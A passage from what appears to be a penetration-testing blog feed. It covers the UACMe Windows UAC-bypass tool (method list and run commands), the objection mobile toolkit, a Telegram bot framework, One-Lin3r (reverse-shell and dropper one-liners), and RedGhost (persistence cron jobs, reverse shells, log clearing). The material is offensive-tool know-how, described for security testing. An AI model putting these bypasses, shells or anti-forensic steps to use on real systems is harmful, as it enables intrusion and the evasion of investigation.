   Target(s): Attacker defined; Component(s): Attacker defined; Implementation: ucmSPPLUAObjectMethod
   Works from: Windows 7 (7600); Fixed in: Windows 10 RS5 (17763); How: ISPPLUAObject interface method changed

49. Author: RinN; Type: Elevated COM interface; Method: ICreateNewLink
   Target(s): \system32\TpmInit.exe; Component(s): WbemComn.dll; Implementation: ucmCreateNewLinkMethod
   Works from: Windows 7 (7600); Fixed in: Windows 10 RS1 (14393); How: Side effect of consent.exe COMAutoApprovalList introduction

50. Author: Anonymous; Type: Elevated COM interface; Method: IDateTimeStateWrite, ISPPLUAObject
   Target(s): w32time service; Component(s): w32time.dll; Implementation: ucmDateTimeStateWriterMethod
   Works from: Windows 7 (7600); Fixed in: Windows 10 RS5 (17763); How: Side effect of ISPPLUAObject interface change

51. Author: bytecode77 derivative; Type: Elevated COM interface; Method: IAccessibilityCplAdmin
   Target(s): \system32\rstrui.exe; Component(s): Attacker defined; Implementation: ucmAcCplAdminMethod
   Works from: Windows 7 (7600); Fixed in: Windows 10 RS4 (17134); How: Shell API update

52. Author: David Wells; Type: Whitelisted component; Method: AipNormalizePath parsing abuse
   Target(s): Attacker defined; Component(s): Attacker defined; Implementation: ucmDirectoryMockMethod
   Works from: Windows 7 (7600); Fixed in: unfixed; How: -

53. Author: Emeric Nasi; Type: Shell API; Method: Registry key manipulation
   Target(s): \system32\sdclt.exe; Component(s): Attacker defined; Implementation: ucmShellDelegateExecuteCommandMethod
   Works from: Windows 10 (14393); Fixed in: unfixed; How: -

54. Author: egre55; Type: Dll Hijack; Method: Dll path search abuse
   Target(s): \syswow64\SystemPropertiesAdvanced.exe and other SystemProperties*.exe; Component(s): \AppData\Local\Microsoft\WindowsApps\srrstr.dll; Implementation: ucmEgre55Method
   Works from: Windows 10 (14393); Fixed in: unfixed; How: -

55. Author: James Forshaw; Type: GUI Hack; Method: UIPI bypass with token modification
   Target(s): \system32\osk.exe, \system32\msconfig.exe; Component(s): Attacker defined; Implementation: ucmTokenModUIAccessMethod
   Works from: Windows 7 (7600); Fixed in: unfixed; How: -

56. Author: Hashim Jawad; Type: Shell API; Method: Registry key manipulation
   Target(s): \system32\WSReset.exe; Component(s): Attacker defined; Implementation: ucmShellDelegateExecuteCommandMethod
   Works from: Windows 10 (17134); Fixed in: unfixed; How: -

57. Author: Leo Davidson derivative by Win32/Gapz; Type: Dll Hijack; Method: IFileOperation
   Target(s): \system32\sysprep\sysprep.exe; Component(s): unattend.dll; Implementation: ucmStandardAutoElevation
   Works from: Windows 7 (7600); Fixed in: Windows 8.1 (9600); How: sysprep.exe hardened LoadFrom manifest elements

Notes:

- Method (6) is unavailable in a wow64 environment starting from Windows 8;
- Methods (11) and (54) are implemented only in the x86-32 version;
- Methods (13), (19), (30), (38) and (50) are implemented only in the x64 version;
- Method (14) requires process injection; wow64 is unsupported, use the x64 version of this tool;
- Method (26) still works, but its main advantage was the UAC bypass at the AlwaysNotify level. Since 15031 that is gone;
- Method (30) requires x64 because it abuses a WOW64 subsystem feature;
- Method (35) is AlwaysNotify compatible, as there will always be running autoelevated apps, or the user will have to launch them anyway;
- Method (38) requires an internet connection as it executes a remote script located at github.com/hfiref0x/Beacon/blob/master/uac/exec.html;
- Method (55) is not really reliable (as any GUI hack) and is included just for fun.

Run examples:

akagi32.exe 1
akagi64.exe 3
akagi32 1 c:\windows\system32\calc.exe
akagi64 3 c:\windows\system32\charmap.exe

Warning

- This tool shows ONLY popular UAC bypass methods used by malware, and reimplements some of them in a different way, improving the original concepts. Different methods exist that are not yet known to the general public; be aware of this;
- Using method (5) will permanently turn off UAC (after reboot); make sure to do this in a test environment, or don't forget to re-enable UAC after using the tool;
- Using methods (5) and (9) will permanently compromise the security of the target keys (the UAC Settings key for (5) and IFEO for (9)); if you do tests on your real machine, restore the keys' security manually after you complete using this tool;
- This tool is not intended for AV tests and is not tested to work in an aggressive AV environment; if you still plan to use it with installed bloatware AV software, you use it at your own risk;
- Some AV may flag this tool as HackTool; MSE/WinDefender constantly marks it as malware, nope;
- If you run this program on a real computer, remember to remove all program leftovers after usage; for more info about the files it drops to system folders, see the source code;
- Most of the methods were created for x64, with no x86-32 support in mind. I don't see any sense in supporting 32-bit versions of Windows or wow64; however, with small tweaks most of them will run under wow64 as well.

If you are wondering why this still exists and works, here is the explanation, an official Microsoft WHITEFLAG (including totally incompetent statements as a bonus): https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105

Windows 10 support and testing policy

- EOL'ed versions of Windows 10 are not supported and therefore not tested (at the moment of writing the EOL'ed Windows 10 versions are: TH1 (10240), TH2 (10586));
- Insider builds are not supported as methods may be fixed there.

Protection

An account without administrative privileges.

Malware usage

It is currently known that UACMe is used by Adware/Multiplug (9), by Win32/Dyre (3), by Win32/Empercrypt (10 & 13), and by the IcedID downloader (35 & 41). We do not take any responsibility for this tool's usage for malicious purposes. It is free, open-source and provided AS-IS for everyone.

Other usage

- Currently used as a "signature" by the "THOR APT" scanner (handmade pattern matching fraudware from Germany). We do not take any responsibility for this tool's usage in the fraudware;
- The scamware project called "uacguard" has references to UACMe from their platform. We do not take any responsibility for this tool's usage in the scamware. The repository https://github.com/hfiref0x/UACME and its contents are the only genuine source for UACMe code. We have nothing to do with external links to this project, mentions anywhere, or modifications (forks);
- In July 2016 the so-called "security company" Cymmetria released a report about a script-kiddie malware bundle called "Patchwork" and false-flagged it as APT. They stated it was using the "UACME method", which is in fact just a slightly and unprofessionally modified injector dll from UACMe v1.9, and was using the Carberp/Pitou hybrid method in a malware self-implemented way. We do not take any responsibility for UACMe usage in the dubious advertising campaigns of third party "security companies".

Build

UACMe comes with full source code, written in C with some parts written in C#. In order to build from source you need Microsoft Visual Studio 2013/2015 U2 or later.

Instructions

- Select the Platform Toolset first for the project in the solution you want to build (Project->Properties->General): v120 for Visual Studio 2013; v140 for Visual Studio 2015; v141 for Visual Studio 2017.
- For v140 and above set the Target Platform Version (Project->Properties->General): if v140 then select 8.1 (note that the Windows 8.1 SDK must be installed); if v141 then select 10.0.17134.0 (note that the Windows 10.0.17134 SDK must be installed).
- Note that the Fujinami module is built with .NET Framework 3.0 (this is a requirement for it to work), so .NET Framework 3.0 must be installed if you want to build this module. It can be built with SDK 8.1/10.17134/10.17763.

References

- Windows 7 UAC whitelist, http://www.pretentiousname.com/misc/win7_uac_whitelist2.html
- Malicious Application Compatibility Shims, https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf
- Junfeng Zhang from WinSxS dev team blog, https://blogs.msdn.microsoft.com/junfeng/
- Beyond good ol' Run key, series of articles, http://www.hexacorn.com/blog
- KernelMode.Info UACMe thread, http://www.kernelmode.info/forum/viewtopic.php?f=11&t=3643
- Command Injection/Elevation – Environment Variables Revisited, https://breakingmalware.com/vulnerabilities/command-injection-and-elevation-environment-variables-revisited
- "Fileless" UAC Bypass Using eventvwr.exe and Registry Hijacking, https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
- Bypassing UAC on Windows 10 using Disk Cleanup, https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/
- Using IARPUninstallStringLauncher COM interface to bypass UAC,
http://www.freebuf.com/articles/system/116611.htmlBypassing UAC using App Paths, https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/"Fileless" UAC Bypass using sdclt.exe, https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/UAC Bypass or story about three escalations, https://habrahabr.ru/company/pm/blog/328008/Exploiting Environment Variables in Scheduled Tasks for UAC Bypass, https://tyranidslair.blogspot.ru/2017/05/exploiting-environment-variables-in.htmlFirst entry: Welcome and fileless UAC bypass, https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/Reading Your Way Around UAC in 3 parts: https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-1.htmlhttps://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-2.htmlhttps://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-3.htmlResearch on CMSTP.exe, https://msitpros.com/?p=3960UAC bypass via elevated .NET applications, https://offsec.provadys.com/UAC-bypass-dotnet.htmlUAC Bypass by Mocking Trusted Directories, https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6eYet another sdclt UAC bypass, http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypassUAC Bypass via SystemPropertiesAdvanced.exe and DLL Hijacking, https://egre55.github.io/system-properties-uac-bypass/Accessing Access Tokens for UIAccess, https://tyranidslair.blogspot.com/2019/02/accessing-access-tokens-for-uiaccess.htmlFileless UAC Bypass in Windows Store Binary, https://www.activecyber.us/1/post/2019/03/windows-uac-bypass.htmlAuthors(c) 2014 – 2019 UACMe ProjectDownload UACME

Link: http://feedproxy.google.com/~r/PentestTools/~3/SVc2u0HEg4k/uacme-defeating-windows-user-account.html

Objection v1.6.6 – Runtime Mobile Exploration

objection is a runtime mobile exploration toolkit, powered by Frida. It was built with the aim of helping assess mobile applications and their security posture without the need for a jailbroken or rooted mobile device.

Note: This is not some form of jailbreak / root bypass. By using objection, you are still limited by all of the restrictions imposed by the applicable sandbox you are facing.

features
Supporting both iOS and Android, and having new features and improvements added regularly as the tool is used in real-world scenarios, the following is a short list of only a few key features.

For all supported platforms, objection allows you to:
- Patch iOS and Android applications, embedding a Frida gadget that can be used with objection or just Frida itself.
- Interact with the filesystem, listing entries as well as uploading and downloading files where permitted.
- Perform various memory-related tasks, such as listing loaded modules and their respective exports.
- Attempt to bypass and simulate jailbroken or rooted environments.
- Discover loaded classes and list their respective methods.
- Perform common SSL pinning bypasses.
- Dynamically dump arguments from methods called as you use the target application.
- Interact with SQLite databases inline without the need to download the targeted database and use an external tool.
- Execute custom Frida scripts.

iOS-specific features in objection include the ability to:
- Dump the iOS keychain, and export it to a file.
- Dump data from common storage such as NSUserDefaults and the shared NSHTTPCookieStorage.
- Dump various formats of information in human-readable form.
- Bypass certain forms of TouchID restrictions.
- Watch for method executions by targeting all methods in a class, or just a single method.
- Monitor the iOS pasteboard.
- Dump encoded .plist files in a human-readable format without relying on external parsers.

Android-specific features in objection include the ability to:
- List the application's Activities, Services and Broadcast receivers.
- Start arbitrary Activities available in the target application.
- Watch a class method, reporting execution as it happens.

screenshots
The following screenshots show the main objection REPL, connected to a test application on both an iPad running iOS 10.2.1 and a Samsung Galaxy S5 running Android 6:
- A file system listing of the iOS application's main bundle
- A file system listing of the Android application's bundle
- iOS Keychain dumped for the current application, and later written to a file called keychain.json
- Inline SQLite query tool
- SSL Pinning bypass running for an iOS application
- SSL Pinning bypass running for an Android application
- API usage to list the currently stored iOS sharedHTTPCookieStorage

sample usage
A sample session, where objection version 0.1 is used to explore the application's environment. Newer versions have the REPL prompt set to the current application's name, however usage has remained the same.

prerequisites
To run objection, all you need is the python3 interpreter to be available. Installation via pip should take care of all of the dependencies needed. For more details, please see the prerequisites section on the project wiki.

As for the target mobile applications, for iOS an unencrypted IPA is needed, and for Android the normal APK should be fine. If you have the source code of the iOS application you want to explore, then you can simply embed and load the FridaGadget.dylib from within the Xcode project.

installation
Installation is simply a matter of pip3 install objection. This will give you the objection command. For more detailed update and installation instructions, please refer to the wiki page here.

Download Objection

Link: http://feedproxy.google.com/~r/PentestTools/~3/_lHkwuwDics/objection-v166-runtime-mobile.html

Tourmaline – Telegram Bot Framework For Crystal

Telegram Bot (and hopefully soon Client) API framework for Crystal. Based heavily off of Telegraf, this Crystal implementation allows your Telegram bot to be written in a language that's both beautiful and fast. Benchmarks coming soon.

If you want to extend your bot by using NLP, see my other library Cadmium.

Installation
Add this to your application's shard.yml:

    dependencies:
      tourmaline:
        github: watzon/tourmaline
        version: ~> 0.7.0

Usage
Basic usage

    require "tourmaline/bot"

    alias TGBot = Tourmaline::Bot

    bot = TGBot::Client.new(ENV["API_KEY"])

    bot.command(["start", "help"]) do |message|
      text = "Echo bot is a sample bot created with the Tourmaline bot framework."
      bot.send_message(message.chat.id, text)
    end

    bot.command("echo") do |message, params|
      text = params.join(" ")
      bot.send_message(message.chat.id, text)
    end

    bot.poll

Listening for events
Tourmaline has a number of events that you can listen for (the same events as Telegraf, actually). The full list of events can be found in the documentation.

    bot.on(:text) do |update|
      text = update.message.not_nil!.text.not_nil!
      puts "TEXT: #{text}"
    end

Adding middleware
Middleware can be created by extending the Tourmaline::Bot::Middleware class. All middleware classes need to have a call(update : Update) method. The middleware will be called on every update.

    class MyMiddleware < TGBot::Middleware
      # All middleware include a reference to the parent bot.
      # @bot : Tourmaline::Bot::Client

      def call(update : Update)
        if message = update.message
          if user = message.from_user
            if text = message.text
              puts "#{user.first_name}: #{text}"
            end
          end
        end
      end
    end

    bot.use MyMiddleware

Webhooks
Using webhooks is easy, even locally if you use the ngrok.cr package.

    # bot.poll
    bot.set_webhook("https://example.com/bots/my_tg_bot")
    bot.serve("0.0.0.0", 3400)

    # or with ngrok.cr
    require "ngrok"

    Ngrok.start({ addr: "127.0.0.1:3400" }) do |ngrok|
      bot.set_webhook(ngrok.ngrok_url_https)
      bot.serve("127.0.0.1", 3400)
    end

Payments
You can now accept payments with your Tourmaline app! First make sure you follow the setup instructions here so that your bot is prepared to handle payments. Then just use the send_invoice, answer_shipping_query, and answer_pre_checkout_query methods to send invoices and accept payments.

    bot.command("buy") do |message, params|
      bot.send_invoice(
        message.chat.id,
        "Sample Invoice",
        "This is a test...",
        "123344232323",
        "YOUR_PROVIDER_TOKEN",
        "test1",
        "USD",
        bot.labeled_prices([{label: "Sample", amount: 299}, {label: "Another", amount: 369}]).to_json
      )
    end

Games
The ability to create and run games with your Tourmaline bot is a recent feature that hasn't been tested yet. Please use the issue tracker if you experience problems.

Kemal Middleware
Tourmaline provides middleware for Kemal, just in case you want to use Kemal as the server.

    require "kemal"
    require "tourmaline/kemal/tourmaline_handler"
    require "./your_bot"

    add_handler Kemal::TourmalineHandler.new(
      bot: YourBot.new,
      url: "https://something.com",
      path: "/bot-webhook/#{ENV["TGBOT_API_KEY"]}"
    )

    Kemal.run

Note: Telegram won't send webhook requests to non-SSL domains. This means that you need to be running your Kemal server with SSL enabled. For local development this can be a pain, but it is made much easier with ngrok.cr.

Development
This currently supports the following features:
- Bot API
- Implementation examples
- Easy command syntax
- Robust middleware system
- Standard API queries
- Stickers
- Inline mode
- Long polling
- Webhooks
- Payments
- Games
- Client API (in development)

If you want a new feature, feel free to submit an issue or open a pull request.

Contributing
1. Fork it (https://github.com/watzon/tourmaline/fork)
2. Create your feature branch (git checkout -b my-new-feature)
3. Commit your changes (git commit -am 'Add some feature')
4. Push to the branch (git push origin my-new-feature)
5. Create a new Pull Request

Contributors
- watzon Chris Watson - creator, maintainer

Download Tourmaline

Link: http://feedproxy.google.com/~r/PentestTools/~3/b2eIBVRuc7c/tourmaline-telegram-bot-framework-for.html

One-Lin3r v2.0 – Gives You One-Liners That Aids In Penetration Testing Operations, Privilege Escalation And More

One-Lin3r is a simple, modular and lightweight framework that gives you all the one-liners that you will need while penetration testing (Windows, Linux, macOS or even BSD systems) or hacking generally, with a lot of new features to make all of this fully automated (e.g. you won't even need to copy the one-liners).

Screenshots
It consists of various one-liner types with various functions; some of them are:

    One-liner function   What this function refers to
    Reverse Shell        Various methods and commands to give you a reverse shell.
    PrivEsc              Many commands to help in Enumeration and Privilege Escalation.
    Bind Shell           Various methods and commands to give you a bind shell.
    Dropper              Many ways to download and execute various payload types with various methods.

Features
- A lot of liners for different purposes; currently there are more than 155 liners.
- The auto-complete feature that has been implemented in this framework is not the usual one you always see; here are some highlights:
  - It's designed to fix typos in typed commands to the most similar command with just one tab click, so "seach" becomes "search" and so on, even if you typed any random word similar to a command in this framework.
  - For you lazy ones out there like me, it can predict what liner you are trying to use by typing any part of it. For example, if you typed "use capabilities" and clicked tab, it would be replaced with "use linux/bash/list_all_capabilities" and so on. I can see your smile, you are welcome!
  - If you typed any wrong command then pressed enter, the framework will tell you the nearest command to what you have typed, which could be the one you really wanted.
  - Some less impressive things like auto-complete for variables after the set command, auto-complete for liners after the use and info commands, and finally it converts all uppercase to lowercase automatically, just in case you switched cases by mistake while typing.
  - Finally, you'll find your normal auto-completion things you were using before, like command auto-completion and persistent history, etc.
- Automation:
  - You can automatically copy the liner you want to the clipboard with the copy command instead of using use <liner> and then copying it, which saves a lot of time, of course, if you merge it with the following features.
  - As you may have noticed, you can use a resource file from command-line arguments before starting the framework itself, or send commands directly.
  - Inside the framework you can use the makerc command like in Metasploit, but this time it only saves the correct important commands.
  - There are history and resource commands so you don't need to exit the framework.
  - You can execute as many commands as you want at the same time by splitting them with a semicolon.
- Searching for any liner here is so easy; you can search for a liner by its name, function or even the liner author's name.
- You can add your own liners by following these steps to create a liner as a Python file. After that you can make a pull request with it, then it will be added to the framework and credited with your name, of course.
- The ability to reload the database if you added any liner, without restarting the framework.
- You can add any platform to the liners database just by making a folder in the liners folder and creating a ".liner" file there.
- More...

Note: The liners database is not too big, but it will get bigger with updates and contributions.

Usage
Command-line arguments

    usage: one-lin3r [-h] [-r R] [-x X] [-q]

    optional arguments:
      -h, --help  show this help message and exit
      -r          Execute a resource file (history file).
      -x          Execute a specific command (use ; for multiples).
      -q          Quiet mode (no banner).

Framework commands

    Command                  Description
    --------                 -------------
    help/?                   Show this help menu.
    list/show                List all one-liners in the database.
    search [Keywords..]      Search database for a specific liner by its name, author name or description.
    use <liner>              Use an available one-liner.
    copy <liner>             Use an available one-liner and copy it to clipboard automatically.
    info <liner>             Get information about an available liner.
    set <variable> <value>   Sets a context-specific variable to a value to use while using one-liners.
    variables                Prints all previously specified variables.
    banner                   Display banner.
    reload/refresh           Reload the liners database.
    check                    Prints the core version and checks if you are up-to-date.
    history                  Display command-line most important history from the beginning.
    makerc                   Save command-line history to a file.
    resource <file>          Run the commands stored in a file.
    os <command>             Execute a system command without closing the framework.
    exit/quit                Exit the framework.

Prerequisites before installing
- Python 3.x.
- Any OS; it should work on all, but it's tested on Kali 2018+, Ubuntu 18+, Windows 10, Android with termux and macOS 10.11.

Installing and running
Using pip (the best way to install on any OS):

    pip install one-lin3r
    one-lin3r -h

Installing it from GitHub:

For Windows (after downloading the ZIP and unzipping it):

    python -m pip install ./One-Lin3r-master
    one-lin3r -h

For Linux:

    git clone https://github.com/D4Vinci/One-Lin3r.git
    apt install libncurses5-dev
    pip3 install ./One-Lin3r
    one-lin3r -h

Updating the framework or the database
If you installed it from pip do:

    pip install one-lin3r --upgrade

If you installed it from GitHub, on Linux while outside the directory do:

    cd One-Lin3r && git pull && cd ..
    pip3 install ./One-Lin3r --upgrade

On Windows, if you don't have git installed, redownload the framework zipped!

Note: As the liners are written as Python modules, they are considered part of the framework. So with every new liner added to the framework, its version will get updated.

Contact
- Twitter
- Telegram

Credits and references
- PayloadsAllTheThings
- PowerSploit repo
- arno0x0x - Windows oneliners to download remote payload and execute arbitrary code

Download One-Lin3r

Link: http://feedproxy.google.com/~r/PentestTools/~3/tpDLaHMBIEQ/one-lin3r-v20-gives-you-one-liners-that.html

RedGhost – Linux Post Exploitation Framework Designed To Gain Persistence And Reconnaissance And Leave No Trace

Linux post exploitation framework designed to assist red teams in gaining persistence, reconnaissance and leaving no trace.

- Payloads: Function to generate various encoded reverse shells in netcat, bash, python, php, ruby, perl
- Crontab: Function to create a cron job that downloads and runs the payload every minute for persistence
- Clearlogs: Function to clear logs and make investigation with forensics difficult
- MassInfoGrab: Function to grab mass information on the system
- BanIp: Function to BanIp

Download RedGhost

Link: http://feedproxy.google.com/~r/PentestTools/~3/Gy75mmZWdEY/redghost-linux-post-exploitation.html